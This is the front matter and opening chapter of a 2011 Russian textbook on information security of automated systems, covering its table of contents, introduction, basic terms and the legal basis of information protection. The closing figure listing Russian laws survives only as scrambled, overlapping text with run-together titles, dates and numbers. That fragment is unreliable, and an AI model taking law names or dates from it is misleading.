Информационная безопасность автоматизированных систем posobie - ib - as - vtoroeizdanie-6 - 3 PDF

ЦЕНТР ПОВЫШЕНИЯ КВАЛИФИКАЦИИ СПЕЦИАЛИСТОВ
ПО ТЕХНИЧЕСКОЙ ЗАЩИТЕ ИНФОРМАЦИИ

(ЦПКС ТЗИ)
С.А. Будников, Н.В. Паршин
ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ
АВТОМАТИЗИРОВАННЫХ СИСТЕМ
Учебное пособие
Издание второе, расширенное и доработанное
Воронеж
2011
УДК 681.5(519.8765)
Рецензенты:
Заведующий кафедрой естественнонаучных дисциплин Рос-
сийского государственного социального университета филиал г.
Воронеж доктор технических наук, профессор В.С. Стародубцев;
Профессор кафедры автоматизированных и вычислительных
систем Воронежского государственного технического университета
доктор технических наук, профессор О.Я.Кравец.

Информационная безопасность автоматизированных систем
В учебном пособии излагаются основные понятия и определе-

ния информационной безопасности, основные принципы построения
систем и средств обеспечения информационной безопасности, клас-
сификация объектов защиты информации. Кроме того, важнейшим
аспектом пособия является изучение методов, средств обеспечения
информационной безопасности в автоматизированных системах,
назначение и структура операционных систем, применяемых в со-
ставе вычислительных комплексов средств различного назначения.
Учебное пособие рассчитано на студентов, обучающихся по
специальности 090105 "Комплексное обеспечение информационной
безопасности автоматизированных систем". Оно может быть полез-
но руководителям и специалистам структурных подразделений по
защите информации в федеральных органах исполнительной вла-
сти, администрациях субъектов Российской Федерации, органах
местного самоуправления, организациях и учреждениях.
ISBN 978-5-87456-944-0 Будников С.А., Паршин Н.В., 2011
2
СОДЕРЖАНИЕ
ВВЕДЕНИЕ ...................................................................................... 9
1. ОСНОВЫ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ
БЕЗОПАСНОСТИ В АВТОМАТИЗИРОВАННЫХ СИСТЕМАХ .. 12
1.1. Некоторые проблемы обеспечения информационной
безопасности в Российской Федерации ........................................... 12
1.2. Основные термины и определения.............................. 14
1.3. Правовые основы защиты информации...................... 19
1.3.1. Цели защиты информации ....................................... 21
1.4. Категории информации ................................................ 22
1.4.1. Режимы защиты информации ................................. 26
1.5. Классификация компьютерных преступлений .......... 28
1.6. Руководящие документы ФСТЭК России
(Гостехкомиссии России) в области обеспечения
информационной безопасности ........................................................ 31
1.6.1. Критерии и классы защищенности
автоматизированных систем ............................................................. 38
1.6.2. Показатели защищенности межсетевых экранов .. 42
1.7. Классификация угроз безопасности информации ..... 44
1.8. Основные методы нарушения конфиденциальности,
целостности и доступности информации ........................................ 48
1.9. Атаки на автоматизированные системы ..................... 51
1.9.1. Атаки на уровне систем управления базами данных
52
1.9.2. Атаки на уровне операционной системы ............... 54
1.9.3. Атаки на уровне сетевого программного
обеспечения 67
2. ОСНОВЫ ПОСТРОЕНИЯ СИСТЕМ И МОДЕЛИ
ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ АС .. 70
2.1. Основные принципы построения систем защиты АС
70
2.2. Задачи системы защиты информации и меры их
реализации 72
2.3. Методы и средства обеспечения информационной
безопасности ....................................................................................... 76
2.3.1. Формальные средства защиты ................................ 78
2.3.2. Программные средства обеспечения
информационной безопасности ........................................................ 84
3
2.4. Организация защиты от случайных воздействий и
аварийных ситуаций .......................................................................... 85
2.4.1. Защита информации от случайных воздействий .. 85
2.4.2. Защита информации от аварий ............................... 88
2.5. Модели ограничения доступа и разделения
привилегий на доступ ........................................................................ 89
2.6. Абстрактные модели управления доступа ................. 90
2.6.1. Модель Биба .............................................................. 90
2.6.2. Модель Гогена-Мезигера......................................... 90
2.6.3. Сазерлендская модель .............................................. 91
2.6.4. Модель Кларка-Вильсона ........................................ 91
2.7. Современные модели управления доступом.............. 91
2.8. Системы разграничения доступа ................................. 95
2.8.1. Списки управления доступом к объекту................ 98
2.8.2. Списки полномочий субъектов ............................... 98
2.8.3. Атрибутные схемы ................................................... 99
2.9. Управление механизмами разграничения доступа . 100
2.9.1. Ограничение доступа ............................................. 102
2.9.2. Разделение привилегий на доступ ........................ 104
2.9.3. Контроль доступа к аппаратуре ............................ 105
2.9.4. Разграничение и контроль доступа к информации
106
3. КРИПТОГРАФИЧЕСКИЕ МЕТОДЫ И СРЕДСТВА
ЗАЩИТЫ ИНФОРМАЦИИ ............................................................... 109
3.1. Основные понятия криптографического
преобразования информации .......................................................... 109
3.1.1. Основные методы шифрования ............................ 115
3.1.2. Системы шифрования с закрытым ключом ......... 117
3.1.3. Системы шифрования с открытым ключом ........ 119
3.2. Архитектура алгоритмов ЭЦП .................................. 122
3.2.1. Постановка и проверка подписи ........................... 122
3.2.2. Контроль целостности ........................................... 124
3.2.3. Криптографические методы защиты .................... 127
3.3. Парольные средства защиты...................................... 136
3.3.1. Ограничение доступа к ресурсам информационной
системы 138
3.3.2. Принципы работы парольных взломщиков ......... 139
3.3.3. Практика применения паролей ............................. 140
4
3.4. Механизмы функционирования парольных кешей
операционных систем ...................................................................... 142
3.4.1. Пароли в Linux ........................................................ 142
3.4.2. Теория и практика аудита и восстановления
паролей Windows NT/2000/XP/Vista/Seven/Vista/Seven ............... 143
3.4.3. Защитные механизмы ОС МСВС ......................... 151
3.5. Рекомендации по повышению эффективности
парольной защиты ............................................................................ 157
3.5.1. Рекомендации администратору Windows
NT/2000/XP/Vista/Seven................................................................... 157
3.6. Средства защиты файлов и документов ................... 161
3.6.1. Механизмы паролирования архиваторов ............. 162
3.6.2. Механизмы паролирования документов Microsoft
Office и VBA. 165
3.6.3. Microsoft Word и Excel ........................................... 165
3.6.4. Microsoft Access ...................................................... 166
4. МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ ОТ
ПРОГРАММНО-МАТЕМАТИЧЕСКИХ УГРОЗ ............................ 171
4.1. Современные программно-математические угрозы
информационной безопасности в АС ............................................ 171
4.1.1. Классификация программно-математических угроз
171
4.1.2. Компьютерные вирусы .......................................... 176
4.1.3. Механизмы действия компьютерных вирусов .... 179
4.2. Программные закладки............................................... 185
4.3. Средства нарушения безопасности сетей в АС ....... 186
4.4. Классификация троянских программ ........................ 188
4.5. Проблемы безопасности информации при
распределенной обработки информации ....................................... 190
4.5.1. Особенности Java – технологий ............................ 190
4.5.2. Проблемы безопасности языков сценариев ......... 194
4.5.3. Типовые уязвимости в системе защиты Java ....... 196
4.5.4. Особенности технологии Cookies ......................... 199
4.5.5. Типовые уязвимости файлов Cookies ................... 201
4.5.6. Особенности и типовые уязвимости HTML ........ 202
4.5.7. Особенности технологии ActiveX......................... 204
4.5.8. Типовые уязвимости в элементах ActiveX .......... 209
4.6. Методы и способы обнаружения и анализа алгоритма
вируса 211
5
4.6.1. Анализ алгоритма вируса ...................................... 211
4.6.2. Обнаружение неизвестного вируса ...................... 215
4.7. Методы восстановления пораженных объектов ...... 226
4.7.1. Нейтрализация компьютерных вирусов .............. 228
4.7.2. Восстановление пораженных объектов ............... 230
4.7.3. Инструменты, необходимые для обнаружения,
анализа и нейтрализации вредоносных программ ....................... 233
5. ПРОГРАММНО-АППАРАТНЫЕ СРЕДСТВА
ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ ....... 235
5.1. Методы и средства защиты информации от утечки по
каналам электромагнитных излучений и наводок ....................... 235
5.1.1. Особенности формирования каналов утечки ...... 235
5.1.2. Защита информации от утечки по каналам ПЭМИН
236
5.1.3. Методы и средства защиты от электромагнитных
излучений и наводок ........................................................................ 239
5.2. Современные технологии повышения надежности и
отказоустойчивости ......................................................................... 244
5.3. Программно-аппаратные системы защиты .............. 258
5.4. Аппаратно-программные средства контроля доступа
260
5.5. Межсетевые экраны .................................................... 271
5.6. Средства, методы и типы сканирования состояния
информационной безопасности ...................................................... 278
5.6.1. Механизмы работы сканеров ................................ 281
5.6.2. Этапы сканирования .............................................. 284
5.6.3. Особенности применения сканеров...................... 287
5.6.4. Особенности реализации сканеров ....................... 290
5.7. Методы и средства обнаружения удаленных атак .. 290
5.7.1. Методы, используемые для получения информации
об атаках 290
5.7.2. Состав системы обнаружения атак ....................... 295
6. СИСТЕМНЫЕ ВОПРОСЫ ОБЕСПЕЧЕНИЯ
ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ ..................................... 299
6.1. Основные виды моделей обеспечения
информационной безопасности...................................................... 304
6.2. Общая характеристика математических методов
оценки и обоснования требований к СЗИ ..................................... 305
6
6.3. Анализ методов решения задачи выборки
рационального варианта СЗИ ......................................................... 306
6.4. Оценка эффективности обеспечения информационной
безопасности в АС ........................................................................... 309
6.4.1. Модель элементарной защиты .............................. 309
6.5. Модель многозвенной защиты................................... 316
6.6. Модель многоуровневой защиты .............................. 319
ЗАКЛЮЧЕНИЕ ........................................................................... 328
СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ ................. 330
7
ОБОЗНАЧЕНИЯ И СОКРАЩЕНИЯ
АС - автоматизированная система
АСУ - автоматизированные системы управления
ЗОС - защищенная операционная система
КВ - компьютерный вирус
КСЗ - комплекс средств защиты
ЛВС - локальная вычислительная сеть
МЭ - межсетевой экран
НСД - несанкционированный доступ
ОС - операционная система
ПК - персональный компьютер
ПМВ - программно-математическое воздействие
ПО - программное обеспечение
ПЭМИН - побочные электромагнитные излучения и наводки
СВТ - средство вычислительной техники
СВЧ - сверхвысокие частоты
СГИ - система графического интерфейса
СЗИ - системы защиты информации
СПО - сетевое (специальное) программное обеспечение
СУБД - системы управления базами данных
ЭЗ - электронный замок
8
ВВЕДЕНИЕ
Современный этап развития общества характеризуется возрастаю-
щей ролью информационной сферы, представляющей собой совокуп-
ность информационных ресурсов, информационной инфраструктуры,
системы формирования, распространения, использования информации и
регулирования возникающих при этом общественных отношений. С пе-
реходом на использование автоматизированных систем (АС), информа-
ция подвергается воздействию случайных процессов: неисправностям и
сбоям оборудования, ошибкам операторов и т. д., которые могут приве-
сти к ее разрушению, изменениям на ложную, а также создать предпо-
сылки к доступу к ней посторонних лиц. С дальнейшим усложнением и
широким распространением автоматизированных систем, возросли воз-
можности для преднамеренного доступа к информации. Масштабы при-
менения и приложения информационных технологий стали таковы, что
наряду с проблемами производительности, надежности и устойчивости
функционирования АС, остро встает проблема защиты циркулирующей
в системах информации от несанкционированного доступа. Статистика
фактов несанкционированного доступа к информации (НСД) показыва-
ет, что большинство современных информационных систем достаточно
уязвимо с точки зрения безопасности.
Приведем некоторые факты, свидетельствующие об актуальности
проблемы информационной безопасности.
Каждые двадцать секунд в Соединенных Штатах имеет место пре-
ступление с использованием программных средств. Недавние оценки
исчисляют потери от хищения или повреждения компьютерных данных
в 100 млн. долларов за год, но точная статистика не поддается учету.
Общий ущерб, который понесли компании в 2002 году от НСД, оцени-
вается в $24 млрд. (Forrest Research, 2002 г.).
По мере развития систем управления, основанных на использова-
нии ЭВМ, возникают все более серьезные требования к обеспечению
защиты информации в процесс принятия решений, использования и хра-
нения данных.
В таких условиях проблема ее защиты приобретает еще большее
значение. Этому способствовали:
 увеличение объемов информации, накапливаемой, хранимой и об-
рабатываемой с помощью ЭВМ и других средств вычислительной
техники;
9
 сосредоточение в единых базах данных информации различного
назначения и принадлежности;
 расширение круга пользователей, имеющих доступ к ресурсам вы-
числительной системы и находящимся в ней массивам данных;
 усложнение режимов функционирования технических средств вы-
числительной системы: широкое внедрение многопрограммного
режима, режима разделения времени и реального времени;
 автоматизация межмашинного обмена информацией, в том числе
и на больших расстояниях;
 увеличение количества технических средств и связей в автомати-
зированных системах управления и обработки данных;
 появление персональных ЭВМ, расширяющих возможности не
только пользователя, но и нарушителя.
Причем данные тенденции проявляются практически для всех
уровней иерархии современных информационных технологий, начиная с
архитектурного уровня в целом (Internet и Intranet), включая сетевые
технологии (например, IP v.4.0 и IP Sec), и заканчивая уровнем общеси-
стемных средств (ОС, СУБД) и приложений [17].
Масштабность и массовость применения АС определили значи-
мость обеспечения безопасности государства в информационной сфере.
Это особенно подчеркнуто в принятой в сентябре 2000 года "Доктрине ин-
формационной безопасности Российской Федерации": "Национальная
безопасность Российской Федерации суще ственным образом зависит от
обеспечения информационной безо пасности, и в ходе технического
прогресса эта зависимость будет возрастать" [13].
Проблемы информационной безопасности весьма актуальны в со-
временном мире, и в том числе для Российской Федерации. В материа-
лах комиссии по информационной безопасности Совета безопасности
России прямо говорится: "Против России ведется самая настоящая ин-
формационная война. Вместе с электроникой нам зачастую поставляется
зараженное вирусами программное обеспечение, которое в определен-
ный момент способно парализовать всю систему управления государ-
ством" [24].
Последствия разнообразных информационных воздействий и не-
санкционированного использования информации могут носить весьма
серьезный характер, включая, политический, связанный с опасностью
возникновения войны.
Не менее остро стоит вопрос информационного противоборства на
уровне коммерческих организаций и отдельных граждан. Об этом свиде-
10
тельствуют многочисленные попытки криминальных элементов полу-
чить контроль над компьютерными технологиями для извлечения мате-
риальной выгоды.
Поэтому, одной из целей данного пособия является изучение ос-
новных понятий и определений информационной безопасности, предмета
и объекта защиты информации, влияния проблем защищенности объекта
на ход принятия решений, руководителем а также определение и рас-
смотрение классификации объектов защиты информации. Кроме того,
важнейшим аспектом пособия является изучение методов, средств обес-
печения информационной безопасности в автоматизированных систе-
мах.
При подготовке книги использованы полученные в последнее время
результаты отечественных и зарубежных специалистов в области защи-
ты компьютерной информации. Однако в первую очередь обсуждаются
теоретические и практические результаты проведенных исследований и
проектирования систем обеспечения информационной безопасности в
АС, а также учтен опыт, приобретенный авторами при проведении заня-
тий по ряду учебных дисциплин данного профиля.
Авторы не стремились излагать материал как полные знания, необ-
ходимые специалистам, что и невозможно в таком небольшом объеме, а
главным образом постарались через этот материал дать представление
об основных направлениях и методах защиты информации, которые ре-
ально используются или могут быть использованы в ближайшее время.
Авторы надеются, что учебное пособие будет полезно для изуче-
ния аспирантами и студентами ВУЗов, ориентированных на подготовку
специалистов в области различных приложений информационных тех-
нологий, в первую очередь, в области информационной безопасности,
научным и инженерно-техническим работникам, занимающимся иссле-
дованиями в области защиты информации. Кроме того, учебное пособие
является полезным для руководителей и специалистов структурных под-
разделений по защите информации в федеральных органах исполни-
тельной власти, администрациях субъектов Российской Федерации, ор-
ганах местного самоуправления, организациях и учреждениях.
В пособие добавлены разделы, связанные с описанием защитных
механизмов ОС МСВС и применения теории полумарковских процессов
задачах моделирования и оценки уровня информационной безопасности
автоматизированных систем.
Исключены разделы посвященные описанию различных аспектов
обеспечения информационной безопасности устаревших ОС.
11
1. ОСНОВЫ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ
БЕЗОПАСНОСТИ В АВТОМАТИЗИРОВАННЫХ
СИСТЕМАХ
1.1. Некоторые проблемы обеспечения информационной
безопасности в Российской Федерации
На современном этапе развития цивилизации информация играет
ключевую роль не только в жизни каждого человека, но и в функциони-
ровании общественных и государственных институтов. На наших глазах
информатизация общества развивается стремительно и зачастую не-
предсказуемо, а мы лишь начинаем осознавать его социальные, полити-
ческие, экономические и другие последствия. Информатизация нашего
общества ведет к созданию единого мирового информационного про-
странства, в рамках которого производится накопление, обработка, хра-
нение и обмен информацией между субъектами этого пространства —
людьми, организациями, государствами.
Очевидно, что возможности быстрого обмена политической, эко-
номической, научно-технической и другой информацией, применение
новых технологий во всех сферах общественной жизни и особенно в
производстве и управлении является несомненным благом. Однако, ин-
форматизация может стать источником серьезных проблем безопасности
государства. Проблемными объектами становятся информационные си-
стемы (включая линии передач, обрабатывающие центры и человече-
ские факторы этих систем), а также информационные технологии, ис-
пользуемые в системах управления.
Крупномасштабное противостояние между общественными груп-
пами или государствами имеет целью изменить расстановку сил в обще-
стве. Оно базируется на самых передовых технологиях и понимании
собственной уязвимости, особенно гражданского сектора, поэтому про-
блемы защиты от "информационного терроризма" сегодня выходят на
первый план. Последнее обстоятельство следует помнить руководству
многих российских государственных и корпоративных сетей, которые
уже активно работают в Internet и намерены подключаться к другим
глобальным телекоммуникационным сетям.
Уязвимость национальных информационных ресурсов стран, обес-
печивающих своим пользователям работу в мировых сетях, — вещь
обоюдоострая. Информационные ресурсы "противников" взаимно уяз-
12
вимы средствами уничтожения, искажения или хищения информацион-
ных массивов, средствами преодоления систем защиты, ограничения до-
пуска законных пользователей. Приведенные факты свидетельствует о
том, что сейчас как никогда актуальна проблема информационного
вторжения в компьютерные сети. Выход этой угрозы на первый план
связан с тем, что современные системы управления являются системами
критических приложений с высоким уровнем компьютеризации.
Считается, что для предотвращения или нейтрализации послед-
ствий применения информационного оружия необходимо принять сле-
дующие меры[26]:
 защита материально-технических объектов, составляющих физи-
ческую основу информационных ресурсов;
 обеспечение нормального и бесперебойного функционирования
баз и банков данных;
 защита информации от несанкционированного доступа, ее иска-
жения или уничтожения;
 сохранение качества информации (своевременности, точности,
полноты и не обходимой доступности).
Создание технологий обнаружения воздействий на информацию, в
том числе в открытых сетях, — это естественная защитная реакция на
появление нового оружия. Экономическую и научно-техническую поли-
тику подключения государства к мировым открытым сетям следует рас-
сматривать через призму информационной безопасности. Будучи откры-
той, ориентированной на соблюдение законных прав граждан на инфор-
мацию и интеллектуальную собственность, эта политика должна преду-
сматривать защиту сетевого оборудования на территории страны от
проникновения в него элементов информационного оружия. Это осо-
бенно важно сегодня, когда осуществляются массовые закупки зарубеж-
ных информационных технологий.
Понятно, что без подключения к мировому информационному про-
странству страну ожидает экономическое прозябание. Оперативный до-
ступ к информационным и вычислительным ресурсам, поддерживаемым
сетью Internet, разумеется, следует приветствовать как фактор преодоле-
ния международной изоляции и внутренней дезинтеграции, как условие
укрепления государственности, институтов гражданского общества, раз-
вития социальной инфраструктуры.
Однако следует отчетливо представлять, что участие России в меж-
дународных системах телекоммуникаций и информационного обмена
невозможно без комплексного решения проблем информационной без-
13
опасности. Особенно остро проблемы защиты собственных информаци-
онных ресурсов в открытых сетях встают перед странами, которые тех-
нологически отстают в области информационных и телекоммуникаци-
онных технологий от США или Западной Европы [21]. К числу таких
стран, к сожалению, относится и Россия. Сегодняшнее состояние рос-
сийской экономики, неразвитость информационной инфраструктуры,
неподготовленность российских пользователей к эффективной работе в
открытых сетях не позволяют реализовать полноценное участие страны
в таких сетях и пользоваться всеми новыми технологиями.
Следует помнить о защите национальных информационных ресур-
сов и сохранении конфиденциальности информационного обмена по
мировым открытым сетям. Вполне вероятно, что на этой почве могут
возникать политическая и экономическая конфронтация государств, но-
вые кризисы в международных отношениях.
Обеспечение безопасности автоматизированной системы предпола-
гает создание препятствий для любого несанкционированного вмеша-
тельства в процесс ее функционирования, а также для попыток хищения,
модификации, выведения из строя или разрушения всех ее компонентов.
Исследования проблемы обеспечения безопасности автоматизиро-
ванных систем ведутся по многим направлениям. Серьезно изучается
статистика нарушений, вызывающие их причины, личности нарушите-
лей, суть применяемых нарушителями приемов и средств, используемые
при этом недостатки систем и средств их защиты, обстоятельства, при
которых было выявлено нарушение, и другие вопросы.
Прежде всего, необходимо разобраться, что такое безопасность ин-
формационных отношений, определить что (кого), от чего, почему и за-
чем надо защищать. Только получив четкие ответы на данные вопросы,
можно правильно сформулировать общие требования к системе обеспе-
чения безопасности и переходить к обсуждению вопросов построения
соответствующей защиты.
1.2. Основные термины и определения

В связи с имеющимися в настоящее время различным пониманием
и толкованием специалистами некоторых терминов и определений целе-
сообразно вначале ознакомиться с основными терминами и определени-
ями, которые используются при изучении дисциплины "Программно-
аппаратные средства обеспечения информационной безопасности".
Область информационной безопасности охватывает практически
все основные сферы жизнедеятельности общества, куда входят полити-
14
ческая, экономическая, социально-психологическая, научно-
производственная, религиозная, военная, а также сферы международных
отношений и массовой информации.
Три составляющие комплексной системы информационной без-
опасности, на совершенствование которых должно быть направлено
внимание государственных структур. К этим составляющим относятся
следующие виды обеспечения: нормативно-правовое, организационное
и технологическое. При этом каждый из видов обеспечения может иметь
общие и частные аспекты своего развития.
Национальная безопасность обеспечивается путем предотвраще-
ния или парирования внутренних и внешних угроз в различных сферах
жизни общества - политической, экономической, оборонной, экологиче-
ской, информационной и др.
В каждой из этих сфер государство, выражающее интересы всего
общества, обязано принимать меры, предотвращающие угрозы безопас-
ности.
В доктрине информационной безопасности РФ под информа-
ционной безопасностью понимается состояние защищенности ин-
формационной среды общества, обеспечивающее ее формирование и
развитие в интересах граждан, организаций и государства [13].
Мы будем рассматривать частное определение, которое приведено
ниже.
Информация - сведения о лицах, предметах, фактах, событиях, яв-
лениях и процессах независимо от формы их представления.
Информация может существовать в различных формах представле-
ния на носителях различных типов. Рассмотрим только те формы пред-
ставления информации, которые используются субъектами при ее авто-
матизированной обработке. В дальнейшем субъектами будем называть,
общественные или коммерческие организации и предприятия (юридиче-
ские лица), отдельных граждан (физические лица).
Защищаемой информацией называют информацию, являющуюся
предметом собственности и подлежащую защите в соответствии с тре-
бованиями правовых документов или требованиями, установленными
собственником информации.
Однако защите подлежит не всякая информация, а только та, ко-
торая имеет цену. Ценной становится та информация, обладание кото-
рой позволит ее существующему и потенциальному владельцу получить
какой-либо выигрыш: военный, моральный, материальный, политиче-
ский и т.д.
15
Под информационной безопасностью понимается защищенность
информационной системы от случайного или преднамеренного вмеша-
тельства, наносящего ущерб владельцам или пользователям информации.
На практике важнейшими являются три аспекта информационной
безопасности: доступность, целостность, конфиденциальность.
Доступность информации – свойство информации, технических
средств и технологии ее обработки, характеризующееся способностью
обеспечивать беспрепятственный доступ к информации субъектов, име-
ющих на это надлежащие полномочия.
Целостность информации – свойство информации, технических
средств и технологии ее обработки, характеризующееся способностью
противостоять несанкционированному или непреднамеренному уничто-
жению и искажению информации.
Конфиденциальность информации –обязательное для выполне-
ния лицом, получившим доступ к определенной информации, требова-
ние не передавать такую информацию третьим лицам без согласия ее
обладателя.
Автоматизированная система - организационно-техническая си-
стема, представляющая собой совокупность следующих взаимосвязан-
ных компонентов:
 технических средств обработки и передачи данных (средств вы-
числительной техники и связи);
 методов и алгоритмов обработки в виде соответствующего про-
граммного обеспечения;
 информации (массивов, наборов, баз данных) на различных носи-
телях;
 персонала и пользователей системы, объединенных по организа-
ционно-структурному, тематическому, технологическому или дру-
гим признакам для выполнения автоматизированной обработки
информации (данных) с целью удовлетворения информационных
потребностей субъектов информационных отношений.
Комплекс средств автоматизации обработки информации -
территориально-сосредоточенный комплекс аппаратных и программных
средств, выполняющих общую задачу по автоматизированной обработке
информации: вычислительная система, узел коммутации, абонентский
пункт, система телеобработки данных и т. д.
Информационная безопасность АС - состояние защищенности рас-
сматриваемой АС, при котором она, с одной стороны, способна противо-
стоять дестабилизирующему воздействию внешних и внутренних инфор-
16
мационных угроз, а с другой - ее наличие и функционирование не создает
информационных угроз для элементов самой системы и внешней среды.
Одной из особенностей обеспечения информационной безопасности
в АС является то, что абстрактным понятиям, таким как "субъект досту-
па", "информация" и т.п., ставятся в соответствие физические представ-
ления в среде вычислительной техники: для представления "субъектов
доступа" - активные программы и процессы, для представления инфор-
мации - машинные носители информации в виде внешних устройств
компьютерных систем (терминалов, печатающих устройств, различных
накопителей, линий и каналов связи), томов, разделов и подразделов то-
мов, файлов, записей, полей записей, оперативной памяти и т.д.
Нарушитель в вычислительной системе - посторонний человек
или законный пользователь, предпринимающий попытку несанкциони-
рованного доступа к информации в корыстных интересах, для развлече-
ния или самоутверждения.
Несанкционированный доступ к информации (НСД) - несанкцио-
нированные действия нарушителя, выразившиеся в разрушении, хище-
нии, модификации информации или ознакомлении с ее содержанием,
используя возможности этих технических средств
Объект защиты информации - система обработки данных, содер-
жащая информацию, подлежащую защите.
Предмет защиты в АС - информация, подлежащая защите, ука-
занная в техническом задании на АС.
Система защиты информации - система, встроенная в структуру
АС, представляющая собой регулируемый целостный механизм, состо-
ящий из системы взаимосвязанных централизованно управляемых пре-
град, перекрывающих каналы несанкционированного доступа к инфор-
мации, подлежащей защите.
Угроза безопасности информации – случайная или преднамерен-
ная деятельность людей или физической явление, которые могут приве-
сти к нарушению безопасности информации.
Источник угрозы безопасности информации – любое физиче-
ское лицо, материальный объект или явление, создающие угрозу без-
опасности информации при ее обработке техническими средствами.
Утечка информации – утрата свойств конфиденциальности ин-
формации.
Искажение информации – любое преднамеренное или случайное
изменение информации при ее обработке техническими средствами, ме-
няющее содержание этой информации.
17
Уничтожение информации – действие, в результате которого
информация перестает физически существовать в технических средствах
ее обработки.
Подделка информации – преднамеренное действие по созданию
ложной информации в технических средствах ее обработки.
Блокирование информации – прекращение или затруднение до-
ступа законных пользователей к информации при ее обработке техниче-
скими средствами.
Программно-математическое воздействие (ПМВ) – нарушение
безопасности информации с помощью специально создаваемых в этих
целях программ.
Аппаратная закладка – электронное устройство, встраиваемое
или подключаемое к элементам технических средств обработки инфор-
мации в целях нарушения безопасности информации при ее обработке
техническими средствами.
Под обработкой информации в АС будем понимать любую сово-
купность операций (сбор, накопление, хранение, преобразование, отоб-
ражение, выдача и т.п.), осуществляемых над информацией (сведениями,
данными) с использованием средств АС.
Различные субъекты по отношению к определенной информации
могут выступать в качестве (возможно одновременно):
 источников (поставщиков) информации;
 обладатель информации;
 физических и юридических лиц, о которых собирается информа-
ция;
 владельцев систем сбора и обработки информации и участников
процессов обработки и передачи информации и т.д.
Для организации эффективной обработки информации возникает
необходимость в обеспечении:
 своевременного доступа к необходимой им информации;
 конфиденциальности (сохранения в тайне) определенной инфор-
мации;
 достоверности (полноты, точности, адекватности, целостности)
информации;
 защиты от навязывания им ложной (недостоверной, искаженной)
информации (то есть от дезинформации);
 защиты части информации от незаконного ее тиражирования (за-
щиты авторских прав, прав собственника информации и т.п.);
18
 возможности осуществления непрерывного контроля и управления
процессами обработки и передачи информации.
В качестве объектов, подлежащих защите в интересах обеспече-
ния безопасности субъектов информационных отношений, должны рас-
сматриваться: информация, ее носители и процессы ее обработки.
Однако всегда следует помнить, что уязвимыми, в конечном счете, яв-
ляются именно субъекты, заинтересованные в обеспечении определен-
ных свойств информации и систем ее обработки. В дальнейшем, говоря
об обеспечении безопасности АС или циркулирующей в системе ин-
формации, всегда будем понимать под этим косвенное обеспечение без-
опасности субъектов, участвующих в процессах автоматизированного
информационного взаимодействия.
Таким образом, конечной целью обеспечения информационной без-
опасности в АС и защиты циркулирующей в ней информации является
предотвращение или минимизация наносимого субъектам информаци-
онных отношений ущерба (прямого или косвенного, материального, мо-
рального или иного) посредством нежелательного воздействия на ком-
поненты АС, а также разглашения (утечки), искажения (модификации),
утраты (снижения степени доступности) или незаконного тиражирова-
ния информации.
Наибольшую сложность при решении вопросов обеспечения без-
опасности конкретных информационно-управляющих систем (информа-
ционных технологий) представляет задача определения реальных требо-
ваний к уровням защиты критичной для субъектов информации, цирку-
лирующей в АС.
1.3. Правовые основы защиты информации

Информация играет особую роль в процессе развития цивилизации.
Владение информационными ресурсами создает предпосылки прогрес-
сивного развития общества. Искажение информации, блокирование про-
цесса ее получения или внедрение ложной информации, способствуют
принятию ошибочных решений.
Основой законодательного обеспечения информационной безопас-
ности является Конституция Российской Федерации, в которой закреп-
лено право граждан, организаций и государства на тайну. Структура за-
конодательной базы информационной безопасности России представле-
на на рис.1.
19
Конституция
Российской Федерации Концепция национальной
безопасности
Закон РФ
«О безопасности»
Доктрина информационной
ФЗ от 27.07.2006 N 149-ФЗ безопасности РФ
"ОБ ИНФОРМАЦИИ, ИНФОРМАЦИОННЫХ
ТЕХНОЛОГИЯХ И О ЗАЩИТЕ ИНФОРМАЦИИ"
Законы РФ, Законы РФ Документы РФ,

определяющие работу с об отдельных видах регулирующие
информацией различных информационного международный
видов обеспечения Информационный обмен
ФЗ от 27.07.2006 N 152-ФЗ ФЗотот10.01.2002

ФЗ от 27.07.2006 N 152-ФЗ ФЗ 10.01.2002NN1-ФЗ
1-ФЗ"ОБ
"ОБ УКАЗПрезидента
УКАЗ
УКАЗ ПрезидентаРФ
ПРЕЗИДЕНТА РФот
РФ от
ОТ
"О ПЕРСОНАЛЬНЫХДАННЫХ"
"ОПЕРСОНАЛЬНЫХ ДАННЫХ" ЭЛЕКТРОННОЙ ЦИФРОВОЙ 17.03.2008
12.05.2004 N 351
N 611
ЭЛЕКТРОННОЙ ЦИФРОВОЙ 12.05.2004
"О N 611
ПОДПИСИ"
ПОДПИСИ" "ОМЕРАХ
МЕРАХПО ПО ОБЕСПЕЧЕ-
ЗАКОНРФ
ЗАКОН РФот
от21.07.1993
21.07.1993NN5485-1
5485-1 "О
НИЮМЕРАХ ПО
ИНФОРМАЦИОННОЙ
ЗАКОН РФотот27.12.1991 ОБЕСПЕЧЕНИЮ
ГОСУДАРСТВЕННОЙТАЙНЕ"
"ОГОСУДАРСТВЕННОЙ
"О ТАЙНЕ" ЗАКОН РФ 27.12.1991NN2124-1
2124-1 ОБЕСПЕЧЕНИЮ
БЕЗОПАСНОСТИ РОССИЙ-
"О СРЕДСТВАХ МАССОВОЙ ИНФОРМАЦИОННОЙ
СКОЙ ФЕДЕРАЦИИ ПРИ
"О СРЕДСТВАХ МАССОВОЙ ИНФОРМАЦИОННОЙ
ФЗот
ФЗ от29
29июля
июля2004
2004года
годаNN98-ФЗ
98-ФЗ ИНФОРМАЦИИ" БЕЗОПАСНОСТИИНФОР-
ИСПОЛЬЗОВАНИИ
БЕЗОПАСНОСТИ
ИНФОРМАЦИИ"
?О“О КОММЕРЧЕСКОЙ ТАЙНЕ”
КОММЕРЧЕСКОЙ ТАЙНЕ? ЗАКОН РФ “О АРХИВНОМ РОССИЙСКОЙ
МАЦИОННО-
РОССИЙСКОЙ
Закон
ФОНДЕРФ«О архивном
И АРХИВАХ”
ТЕЛЕКОММУНИКАЦИОН-
ФЕДЕРАЦИИ
ФЕДЕРАЦИИ ВВСФЕРЕ
СФЕРЕ
Закон РФ“О ПРАВОВОЙ ОХРАНЕ
ЗАКОН РФ Фонде и архивах» НЫХ СЕТЕЙ МЕЖДУНА-
МЕЖДУНАРОДНОГО
МЕЖДУНАРОДНОГО
